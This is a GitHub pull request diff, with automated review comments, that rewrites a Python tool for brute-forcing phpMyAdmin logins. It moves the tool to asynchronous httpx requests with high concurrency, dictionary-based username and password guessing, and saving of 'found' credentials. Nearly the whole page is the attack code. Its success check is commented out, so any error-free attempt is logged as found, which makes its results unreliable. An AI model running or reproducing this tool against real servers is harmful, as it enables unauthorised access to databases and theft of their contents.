Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
187 changes: 144 additions & 43 deletions main.py
Original file line number Diff line number Diff line change
@@ -1,71 +1,162 @@
#!/usr/bin/env python3
from ast import arg
Copy link

Copilot AI Feb 27, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Unused import 'arg' from 'ast' module. This import appears to be leftover from previous code and is not used anywhere in the file.

Suggested change
from ast import arg

Copilot uses AI. Check for mistakes.
from concurrent.futures import thread
import sys
import requests
import httpx
import html
import re
import os
import argparse
import threading, time
import asyncio
import logging
from datetime import datetime

stop_flag = 0
# Configure logging
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
handlers=[
logging.StreamHandler()
]
)
logger = logging.getLogger(__name__)

def login(url, username, password):

for i in range(3):
try:
res = requests.get(url)
cookies = dict(res.cookies)
data = {
'set_session': html.unescape(re.search(r"name=\"set_session\" value=\"(.+?)\"", res.text, re.I).group(1)),
'token': html.unescape(re.search(r"name=\"token\" value=\"(.+?)\"", res.text, re.I).group(1)),
'pma_username': username,
'pma_password': password,
}
res = requests.post(url, cookies=cookies, data=data)
cookies = dict(res.cookies)
#return 'pmaAuth-1' in cookies
print("[*] FOUND - %s / %s" % (username, password))
f = open("found.txt", "w")
f.write("%s / %s\n" % (username, password))
f.close()
stop_flag = 1
except:
pass
print("[!] FAILED - %s / %s" % (username, password))
# Suppress httpx logging
logging.getLogger("httpx").setLevel(logging.WARNING)

stop_flag = asyncio.Event()
progress_counter = 0
progress_lock = asyncio.Lock()
total_tasks = 0

def bruteforce(users, passwords, url):
for user in users:
for password in passwords:
async def login(client, url, username, password, semaphore, outfile):
global progress_counter, total_tasks

# Check if another task already found credentials
if stop_flag.is_set():
return

async with semaphore:
for i in range(3):
try:
if stop_flag == 1:
t.join()
exit()
t = threading.Thread(target = login, args = (url, user, password))
t.start()
time.sleep(0.2)
except KeyboardInterrupt:
t.join()
print("Cancelling")
exit()
res = await client.get(url)
cookies = dict(res.cookies)
data = {
'set_session': html.unescape(re.search(r"name=\"set_session\" value=\"(.+?)\"", res.text, re.I).group(1)),
'token': html.unescape(re.search(r"name=\"token\" value=\"(.+?)\"", res.text, re.I).group(1)),
'pma_username': username,
'pma_password': password,
}
res = await client.post(url, cookies=cookies, data=data)
cookies = dict(res.cookies)

t.join()
logger.info(f"[FOUND] {username} / {password}")
with open(outfile, "w") as f:
f.write("%s / %s\n" % (username, password))
Comment on lines +54 to +55
Copy link

Copilot AI Feb 27, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Race condition: multiple tasks can read the stop_flag status at line 36 before any of them sets it at line 56, causing multiple tasks to write to the same output file simultaneously. Since the file is opened with mode "w", each successful write will overwrite the previous one, potentially losing credential information. Consider using "a" (append) mode or adding file locking, or only writing once after all tasks complete.

Copilot uses AI. Check for mistakes.
stop_flag.set()
return
except Exception as e:
pass

# Update progress
async with progress_lock:
progress_counter += 1
percentage = (progress_counter / total_tasks) * 100
print(f"Progress: {percentage:.1f}% ({progress_counter}/{total_tasks})", end='\r')


async def bruteforce(users, passwords, url, max_threads=50, outfile="found.txt"):
global total_tasks, progress_counter

try:
logger.info(f"Starting bruteforce attack on {url}")
logger.info(f"Testing {len(users)} user(s) with {len(passwords)} password(s)")
logger.info(f"Max concurrent threads: {max_threads}")
Copy link

Copilot AI Feb 27, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Misleading terminology: the parameter is named 'max_threads' and the log message says "Max concurrent threads", but async/await uses coroutines, not threads. The correct terminology should be "max concurrent tasks" or "max concurrency" to accurately reflect the async implementation.

Suggested change
logger.info(f"Max concurrent threads: {max_threads}")
logger.info(f"Max concurrent tasks: {max_threads}")

Copilot uses AI. Check for mistakes.
logger.info(f"Output file: {outfile}")

# Calculate estimated time
total_combinations = len(users) * len(passwords)
estimated_time_per_request = 1.0 # seconds (average, including retries)
Copy link

Copilot AI Feb 27, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Magic number 1.0 for estimated_time_per_request is hardcoded without explanation. This estimate is likely inaccurate since the code makes 2 HTTP requests per attempt (GET then POST) and includes retry logic (up to 3 attempts). Consider making this configurable or documenting why this specific value was chosen.

Copilot uses AI. Check for mistakes.
estimated_total_time = (total_combinations / max_threads) * estimated_time_per_request

hours = int(estimated_total_time // 3600)
minutes = int((estimated_total_time % 3600) // 60)
seconds = int(estimated_total_time % 60)

if hours > 0:
time_str = f"{hours}h {minutes}m {seconds}s"
elif minutes > 0:
time_str = f"{minutes}m {seconds}s"
else:
time_str = f"{seconds}s"

logger.info(f"Total combinations: {total_combinations}")
logger.info(f"Estimated time: {time_str}")
logger.info("-" * 50)

total_tasks = total_combinations
progress_counter = 0

# Create semaphore to limit concurrent tasks
semaphore = asyncio.Semaphore(max_threads)

# Use httpx AsyncClient with connection pooling
limits = httpx.Limits(max_connections=max_threads, max_keepalive_connections=max_threads // 2)
async with httpx.AsyncClient(timeout=10.0, limits=limits) as client:
# Process in batches to avoid creating millions of task objects at once
batch_size = max_threads * 2
tasks = []

for user in users:
if stop_flag.is_set():
break
for password in passwords:
if stop_flag.is_set():
break

task = login(client, url, user, password, semaphore, outfile)
tasks.append(task)

# Process batch when it reaches batch_size
if len(tasks) >= batch_size:
await asyncio.gather(*tasks, return_exceptions=True)
tasks = []
if stop_flag.is_set():
break

if stop_flag.is_set():
break

# Process remaining tasks
if tasks and not stop_flag.is_set():
await asyncio.gather(*tasks, return_exceptions=True)

print() # New line after progress bar
logger.info("-" * 50)
if stop_flag.is_set():
logger.info("Credentials found! Stopping bruteforce.")
else:
logger.warning("Bruteforce completed - no valid credentials found")
except Exception as e:
logger.error(f"Error during bruteforce: {str(e)}")
raise


def main():
parser = argparse.ArgumentParser(description='e.g. python3 %s -url http://example.com/pma/ -user root -dict password.txt' % (os.path.basename(__file__)))
parser.add_argument('-url', help='The URL of target website')
parser.add_argument('-user', default='root', help='The username of MySQL (default: root)')
parser.add_argument('-udict', default='none.txt', help='The file path of username dictionary (default: NULL)')
parser.add_argument('-pdict', default='password.txt', help='The file path of password dictionary (default: password.txt)')
parser.add_argument('-max-threads', type=int, default=50, help='Maximum number of concurrent threads (default: 50)')
parser.add_argument('-outfile', default='found.txt', help='The file path to save found credentials (default: found.txt)')

args = parser.parse_args()
url = args.url
pwdDictionary = args.pdict
userDictionary = args.udict
max_threads = args.max_threads
outfile = args.outfile

if url is None:
parser.print_help()
Expand All @@ -76,19 +167,29 @@ def main():
f = open(pwdDictionary, "r")
passwords = re.split("[\r\n]+", f.read())
f.close()
passwords = [p for p in passwords if p] # Remove empty strings
logger.info(f"Loaded {len(passwords)} passwords from '{pwdDictionary}'")
except:
print("[-] Failed to read '%s' file." % (pwdDictionary))
logger.error(f"Failed to read password file: {pwdDictionary}")
return

#Getting users
try:
f = open(userDictionary, "r")
users = re.split("[\r\n]+", f.read())
f.close()
users = [u for u in users if u] # Remove empty strings
logger.info(f"Loaded {len(users)} users from '{userDictionary}'")
except:
users = [args.user]
logger.info(f"Using default user: {args.user}")

bruteforce(users, passwords, url)
bruteforce_task = bruteforce(users, passwords, url, max_threads, outfile)
try:
asyncio.run(bruteforce_task)
except KeyboardInterrupt:
logger.warning("Bruteforce cancelled by user")
sys.exit(0)


if __name__ == '__main__':
Expand Down